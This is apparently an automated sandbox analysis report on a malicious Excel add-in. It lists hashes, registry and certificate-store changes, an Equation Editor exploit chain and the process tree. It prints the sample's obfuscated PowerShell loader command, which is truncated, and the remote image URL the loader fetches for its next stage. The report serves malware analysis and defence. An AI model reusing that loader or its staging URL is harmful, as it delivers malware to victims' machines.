Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
21-10-2023 18:53
Static task
static1
Behavioral task
behavioral1
Sample
NEAS.NEASf4d8c1a30a7b5bcc8c486c0be1255b620da33af0bd491fe6bc28a1ae90300428xlsxxlsx_JC.xlam
Resource
win7-20231020-en
Behavioral task
behavioral2
Sample
NEAS.NEASf4d8c1a30a7b5bcc8c486c0be1255b620da33af0bd491fe6bc28a1ae90300428xlsxxlsx_JC.xlam
Resource
win10v2004-20231020-en
General
-
Target
NEAS.NEASf4d8c1a30a7b5bcc8c486c0be1255b620da33af0bd491fe6bc28a1ae90300428xlsxxlsx_JC.xlam
-
Size
725KB
-
MD5
7c8f10ca8113bde86cc98e6e08c2318c
-
SHA1
6d985706cb5c210d944e07b24dffd9ae5d57927f
-
SHA256
f4d8c1a30a7b5bcc8c486c0be1255b620da33af0bd491fe6bc28a1ae90300428
-
SHA512
165f8514f9157c261b9ca06415e5aa5dc93187fe043eff828ae5f8118c213922b548645fead417edb1aef253dfb7cdffc001af103235ec7735a8709fe47c1e2a
-
SSDEEP
12288:fcs34BfUcKYHk2g6hdeLBC74aSzU8CBSlizbbS1IK64GkBh7HgfPp2j:f8KYLs5zTCQqbbSy4dDSPpk
Malware Config
Extracted
https://wallpapercave.com/uwp/uwp4082989.png
https://wallpapercave.com/uwp/uwp4082989.png
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 3 2716 EQNEDT32.EXE 6 2592 WScript.exe 8 2056 powershell.exe 9 2056 powershell.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 2716 EQNEDT32.EXE -
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-274829-3448035668-3231875956-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-274829-3448035668-3231875956-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-274829-3448035668-3231875956-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-274829-3448035668-3231875956-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-274829-3448035668-3231875956-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-274829-3448035668-3231875956-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-274829-3448035668-3231875956-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-274829-3448035668-3231875956-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-274829-3448035668-3231875956-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob = 040000000100000010000000ebb04f1d3a2e372f1dda6e27d6b680fa1400000001000000140000003edf290cc1f5cc732ceb3d24e17e52dabd27e2f00b000000010000003400000056006500720069005300690067006e002000540069006d00650020005300740061006d00700069006e006700200043004100000009000000010000000c000000300a06082b0601050507030803000000010000001400000018f7c1fcc3090203fd5baa2f861a754976c8dd250f000000010000001000000065fc47520f66383962ec0b7b88a0821d190000000100000010000000e53d34cecb05c17ee332c749d78c02562000000001000000c0020000308202bc3082022502104a19d2388c82591ca55d735f155ddca3300d06092a864886f70d010104050030819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e301e170d3937303531323030303030305a170d3034303130373233353935395a30819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e30819f300d06092a864886f70d010101050003818d0030818902818100d32e20f0687c2c2d2e811cb106b2a70bb7110d57da53d875e3c9332ab2d4f6095b34f3e990fe090cd0db1b5ab9cde7f688b19dc08725eb7d5810736a78cb7115fdc658f629ab585e9604fd2d621158811cca7194d522582fd5cc14058436ba94aab44d4ae9ee3b22ad56997e219c6c86c04a47976ab4a636d5fc092dd3b4399b0203010001300d06092a864886f70d01010405000381810061550e3e7bc792127e11108e22ccd4b3132b5be844e40b789ea47ef3a707721ee259efcc84e389944cdb4e61efb3a4fb463d50340b9f7056f68e2a7f17cee563bf796907732eb095288af5edaaa9d25dcd0aca10098fceb3af2896c479298492dcffba674248a69010e4bf61f89c53e593d1733ff8fd9d4f84ac55d1fd116363 WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25 WScript.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2064 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2168 powershell.exe 2056 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2168 powershell.exe Token: SeDebugPrivilege 2056 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2064 EXCEL.EXE 2064 EXCEL.EXE 2064 EXCEL.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2716 wrote to memory of 2592 2716 EQNEDT32.EXE 30 PID 2716 wrote to memory of 2592 2716 EQNEDT32.EXE 30 PID 2716 wrote to memory of 2592 2716 EQNEDT32.EXE 30 PID 2716 wrote to memory of 2592 2716 EQNEDT32.EXE 30 PID 2592 wrote to memory of 2168 2592 WScript.exe 32 PID 2592 wrote to memory of 2168 2592 WScript.exe 32 PID 2592 wrote to memory of 2168 2592 WScript.exe 32 PID 2592 wrote to memory of 2168 2592 WScript.exe 32 PID 2168 wrote to memory of 2056 2168 powershell.exe 34 PID 2168 wrote to memory of 2056 2168 powershell.exe 34 PID 2168 wrote to memory of 2056 2168 powershell.exe 34 PID 2168 wrote to memory of 2056 2168 powershell.exe 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\NEAS.NEASf4d8c1a30a7b5bcc8c486c0be1255b620da33af0bd491fe6bc28a1ae90300428xlsxxlsx_JC.xlam1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2064
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\wvsdfgjs.vbs"2⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JrJWgRidYoNfCmÇjyDBprJWgRidYoNfCmÇjyDG0rJWgRidYoNfCmÇjyDYQBnrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDVQByrJWgRidYoNfCmÇjyDGwrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD9rJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDJwBorJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDBwrJWgRidYoNfCmÇjyDHMrJWgRidYoNfCmÇjyDOgrJWgRidYoNfCmÇjyDvrJWgRidYoNfCmÇjyDC8rJWgRidYoNfCmÇjyDdwBhrJWgRidYoNfCmÇjyDGwrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDBwrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDcrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDHIrJWgRidYoNfCmÇjyDYwBhrJWgRidYoNfCmÇjyDHYrJWgRidYoNfCmÇjyDZQrJWgRidYoNfCmÇjyDurJWgRidYoNfCmÇjyDGMrJWgRidYoNfCmÇjyDbwBtrJWgRidYoNfCmÇjyDC8rJWgRidYoNfCmÇjyDdQB3rJWgRidYoNfCmÇjyDHrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDLwB1rJWgRidYoNfCmÇjyDHcrJWgRidYoNfCmÇjyDcrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD0rJWgRidYoNfCmÇjyDDrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDOrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDyrJWgRidYoNfCmÇjyDDkrJWgRidYoNfCmÇjyDOrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD5rJWgRidYoNfCmÇjyDC4rJWgRidYoNfCmÇjyDcrJWgRidYoNfCmÇjyDBurJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDJwrJWgRidYoNfCmÇjyD7rJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDdwBlrJWgRidYoNfCmÇjyDGIrJWgRidYoNfCmÇjyDQwBsrJWgRidYoNfCmÇjyDGkrJWgRidYoNfCmÇjyDZQBurJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD9rJWgRidYoNfCmÇjyDCrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDTgBlrJWgRidYoNfCmÇjyDHcrJWgRidYoNfCmÇjyDLQBPrJWgRidYoNfCmÇjyDGIrJWgRidYoNfCmÇjyDagBlrJWgRidYoNfCmÇjyDGMrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDFMrJWgRidYoNfCmÇjyDeQBzrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDZQBtrJWgRidYoNfCmÇjyDC4rJWgRidYoNfCmÇjyDTgBlrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDLgBXrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDYgBDrJWgRidYoNfCmÇjyDGwrJWgRidYoNfCmÇjyDaQBlrJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyD7rJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇjyDaQBtrJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDZwBlrJWgRidYoNfCmÇjyDEIrJWgRidYoNfCmÇjyDeQB0rJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDcwrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDD0rJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDkrJWgRidYoNfCmÇjyDHcrJWgRidYoNfCmÇjyDZQBirJWgRidYoNfCmÇjyDEMrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDBprJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDbgB0rJWgRidYoNfCmÇjyDC4rJWgRidYoNfCmÇjyDRrJWgRidYoNfCmÇjyDBvrJWgRidYoNfCmÇjyDHcrJWgRidYoNfCmÇjyDbgBsrJWgRidYoNfCmÇjyDG8rJWgRidYoNfCmÇjyDYQBkrJWgRidYoNfCmÇjyDEQrJWgRidYoNfCmÇjyDYQB0rJWgRidYoNfCmÇjyDGErJWgRidYoNfCmÇjyDKrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDkrJWgRidYoNfCmÇjyDGkrJWgRidYoNfCmÇjyDbQBhrJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDZQBVrJWgRidYoNfCmÇjyDHIrJWgRidYoNfCmÇjyDbrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDprJWgRidYoNfCmÇjyDDsrJWgRidYoNfCmÇjyDJrJWgRidYoNfCmÇjyDBprJWgRidYoNfCmÇjyDG0rJWgRidYoNfCmÇjyDYQBnrJWgRidYoNfCmÇjyDGUrJWgRidYoNfCmÇjyDVrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDHgrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDgrJWgRidYoNfCmÇjyDD0rJWgRidYoNfCmÇjyDIrJWgRidYoNfCmÇjyDBbrJWgRidYoNfCmÇjyDFMrJWgRidYoNfCmÇjyDeQBzrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDZQBtrJWgRidYoNfCmÇjyDC4rJWgRidYoNfCmÇjyDVrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDHgrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDurJWgRidYoNfCmÇjyDEUrJWgRidYoNfCmÇjyDbgBjrJWgRidYoNfCmÇjyDG8rJWgRidYoNfCmÇjyDZrJWgRidYoNfCmÇjyDBprJWgRidYoNfCmÇjyDG4rJWgRidYoNfCmÇjyDZwBdrJWgRidYoNfCmÇjyDDorJWgRidYoNfCmÇjyDOgBVrJWgRidYoNfCmÇjyDFQrJWgRidYoNfCmÇjyDRgrJWgRidYoNfCmÇjyD4rJWgRidYoNfCmÇjyDC4rJWgRidYoNfCmÇjyDRwBlrJWgRidYoNfCmÇjyDHQrJWgRidYoNfCmÇjyDUwB0rJWgRidYoNfCmÇjyDHIrJWgRidYoNfCmÇjyDaQBurJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDKrJWgRidYoNfCmÇjyDrJWgRidYoNfCmÇjyDkrJWgRidYoNfCmÇjyDGkrJWgRidYoNfCmÇjyDbQBhrJWgRidYoNfCmÇjyDGcrJWgRidYoNfCmÇjyDZQBCrJWgRidYoNfCmÇjyDHkrJWgRidYoNfCmÇjyDdrJWgRidYoNfCmÇjyDBlrJWgRidYoNfCmÇjyDHMrJWgRidYoNfCmÇjyDKQrJWgRidYoNfCmÇjyD7rJWgRidYoNfCmÇjyDCQrJWgRidYoNfCmÇj